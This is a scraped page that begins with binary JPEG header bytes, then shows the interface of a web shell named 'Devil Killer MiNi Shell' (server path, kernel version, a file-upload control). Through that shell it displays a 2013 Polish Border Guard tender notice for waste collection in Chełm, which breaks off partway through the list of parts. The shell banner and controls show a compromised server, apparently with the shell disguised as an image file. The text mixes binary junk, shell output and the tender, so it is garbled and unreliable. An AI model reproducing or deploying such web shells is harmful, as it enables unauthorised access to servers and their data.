JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130523/201070-N-2013.html

<p class="kh_header"><b>Chełm: Odbiór stałych odpadów komunalnych oraz nieczystości płynnych z obiektów będących w zarządzie Nadbużańskiego Oddziału Straży Granicznej</b><br>
<b>Numer ogłoszenia: 201070 - 2013; data zamieszczenia: 23.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadbużański Oddział Straży Granicznej , ul. Trubakowska 2, 22-100 Chełm, woj. lubelskie, tel. 082 5685900, faks 082 5685716.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nadbuzanski.strazgraniczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór stałych odpadów komunalnych oraz nieczystości płynnych z obiektów będących w zarządzie Nadbużańskiego Oddziału Straży Granicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na odbiorze stałych odpadów komunalnych zbieranych w sposób selektywny i niepodlegających selektywnemu zbieraniu (zmieszanych) z PSG w m. Kodeń, Horodło, Kryłów, Wola Uhruska, Chłopiatyn, Janów Podlaski, Dołhobyczów, Hrubieszów,Skryhiczyn, Lubycza Królewska, Bohukały, Terespol, Zbereże, Lublin, oraz usługa polegająca na opróżnieniu zbiorników bezodpływowych na nieczystości  płynne z PSG w m. Dołhobrody i  Kryłów.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca winien złożyć stosowne oświadczenie o spełnieniu warunków udziału w postępowaniu.Dodatkowo Wykonawca winien złożyć: na Część I, II, III, IV, V, VI, VII, VIII, IX, X, XI, XII, XIII, XIV oświadczenie o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych (w rozumieniu ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej Dz. U. z 2004 r. Nr 173, poz. 1808 z późn. zm. ) prowadzonym przez organ ( wójta, burmistrza lub prezydenta) właściwy według miejsca odbierania odpadów komunalnych; 
na Część XV, XVI - złożyć oświadczenie o posiadaniu zezwolenia na prowadzenie działalności w zakresie opróżniania zbiorników bezodpływowych i transportu nieczystości ciekłych, o którym mowa w art. 7 ust. 1 pkt 2 ustawy 
z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz. U. 2012r. poz. 391 z późn. zm.) -  lub oświadczenie firmy o braku obowiązku uzyskania zezwolenia.
Ocena spełnienia warunków zostanie dokonana stosując formułę: spełnia/nie spełnia 
w oparciu o treść dokumentów  i oświadczeń dostarczonych przez Wykonawcę wraz 
z  ofertą. W przypadku nie spełnienia warunków udziału, Wykonawca zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 5 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca winien złożyć stosowne oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunków zostanie dokonana stosując formułę: spełnia/nie spełnia 
w oparciu o treść dokumentów  i oświadczeń dostarczonych przez Wykonawcę wraz 
z  ofertą. W przypadku nie spełnienia warunków udziału, Wykonawca zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 5 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca winien złożyć stosowne oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunków zostanie dokonana stosując formułę: spełnia/nie spełnia 
w oparciu o treść dokumentów  i oświadczeń dostarczonych przez Wykonawcę wraz 
z  ofertą. W przypadku nie spełnienia warunków udziału, Wykonawca zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 5 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca winien złożyć stosowne oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunków zostanie dokonana stosując formułę: spełnia/nie spełnia 
w oparciu o treść dokumentów  i oświadczeń dostarczonych przez Wykonawcę wraz 
z  ofertą. W przypadku nie spełnienia warunków udziału, Wykonawca zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 5 ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca winien złożyć stosowne oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunków zostanie dokonana stosując formułę: spełnia/nie spełnia 
w oparciu o treść dokumentów  i oświadczeń dostarczonych przez Wykonawcę wraz 
z  ofertą. W przypadku nie spełnienia warunków udziału, Wykonawca zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 5 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nadbuzanski.strazgraniczna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadbużański Oddział Straży Granicznej, Sekcja Zamówień Publicznych ul. Trubakowska 2,  22-100 Chełm.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 13:00, miejsce: Kancelaria Jawna Nadbużańskiego Oddziału Straży Granicznej ul. Trubakowska 2,  22-100 Chełm.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odbiór  stałych odpadów komunalnych z PSG w Kodniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w m. Kodeń, ul. 1-go Maja 18 w terminie od 01.07.2013 r. do 30.06.2014 r. w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 7,5 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 7,5 m3
z 1 szt. pojemnika o pojemności 1100 l, będącego własnością Zamawiającego ustawionego na terenie PSG. 
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a)odpady komunalne zbierane w sposób selektywny: 1,5 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 3,5 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 0,63 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odbiór  stałych odpadów komunalnych z PSG w Horodle.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w m. Horodło przy ul. Piłsudskiego 112 w terminie
od 01.07.2013 r. do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 15m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 15 m3 
z 1 szt. pojemnika o pojemności 1100 l, będącego własnością Zamawiającego ustawionego na terenie PSG.
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a) odpady komunalne zbierane w sposób selektywny: 3 m3,
b) odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 7,5 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 1,25 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Odbiór  stałych odpadów komunalnych z PSG w Kryłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w Kryłowie, ul. Hrubieszowska 7 w terminie od 01.07.2013 r. do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 12,5 m3
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 12,5m3 
z 1 szt. pojemnika o pojemności 2,2m3, będącego własnością Zamawiającego ustawionego na terenie PSG. 
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
 a) odpady komunalne zbierane w sposób selektywny: 3 m3,
 b) odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 6 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 1,04 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Odbiór stałych odpadów komunalnych z PSG w Woli Uhruskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w m. Wola Uhruska, ul. Turystyczna 10 w terminie 
od 01.07.2013 r. do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 7 m3 
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 7 m3 
z 1 szt. pojemnika o pojemności 1100 l będącego własnością Zamawiającego ustawionego na terenie PSG. 
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a) odpady komunalne zbierane w sposób selektywny: 1,5 m3,
b) odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 3,5 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 0,58 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Odbiór stałych odpadów komunalnych z PSG w Chłopiatynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w Chłopiatynie 41 A w terminie od 01.07.2013 r. 
do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 5m3 
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 5m3
z 1 szt. pojemnika o pojemności 1100 l, będącego własnością Zamawiającego ustawionego na terenie PSG.
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a)odpady komunalne zbierane w sposób selektywny: 1 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 2,5 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 0,42 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Odbiór stałych odpadów komunalnych z PSG w Janowie Podlaskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w Janowie Podlaskim, ul. Brzeska 71 w terminie
od 01.07.2013 r. do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 16 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 16m3 
z 1 szt. pojemnika o pojemności 1100l, będącego własnością Zamawiającego ustawionego na terenie PSG.
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a)odpady komunalne zbierane w sposób selektywny: 4 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 8 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 1,33 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Odbiór stałych odpadów komunalnych z PSG w Dołhobyczowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z PSG w Dołhobyczowie przy ul. Partyzantów 15 w terminie
od 01.07.2013 r. do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 13,5 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 13,5 m3 z 1 szt. pojemnika o pojemności 2,2m3, będącego własnością Zamawiającego ustawionego na terenie PSG.
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a) odpady komunalne zbierane w sposób selektywny: 3 m3,
b) odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 6,5 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 1,13 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Odbiór stałych odpadów komunalnych PSG w Hrubieszowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w m. Hrubieszów przy ul. Wyzwolenia 56 w terminie
od 01.07.2013 r. do 30.06.2014 r., w ilości szacunkowej: 
a)odpady komunalne zbierane w sposób selektywny: 13 m3
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 13 m3 
z 1 szt. kontenera KP-7, będącego własnością Zamawiającego ustawionego
na terenie PSG. 
2. Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a)odpady komunalne zbierane w sposób selektywny: 3 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 6,5 m3  
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 1,08 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Odbiór stałych odpadów komunalnych z PSG w Skryhiczynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w m. Skryhiczyn 69 w terminie od 01.07.2013 r.
do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 4,5 m3 
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 4,5 m3 z 1 szt. pojemnika o pojemności 1100 l będącego własnością Zamawiającego znajdującego się na terenie nieruchomości PSG. 
2.Zamawiający zobowiązuje się do przekazania min. ilości wytworzonych odpadów:
a)odpady komunalne zbierane w sposób selektywny: 1 m3,
b)odpady komunalne nie podlegające selektywnemu zbieraniu (zmieszane): 2 m3
3.Wykonawca zobowiązuje się do wydzierżawienia oznakowanych pojemników
z przeznaczeniem do gromadzenia segregowanych odpadów komunalnych o łącznej pojemności ok. 0,38 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Odbiór stałych odpadów komunalnych z PSG w Lubyczy Królewskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa, polegająca na odbiorze stałych odpadów komunalnych z obiektu PSG w m. Lubycza Królewska ul. Kolejowa 2 w terminie
od 01.07.2013 r. do 30.06.2014 r., w ilości szacunkowej:
a)odpady komunalne zbierane w sposób selektywny: 12m3,
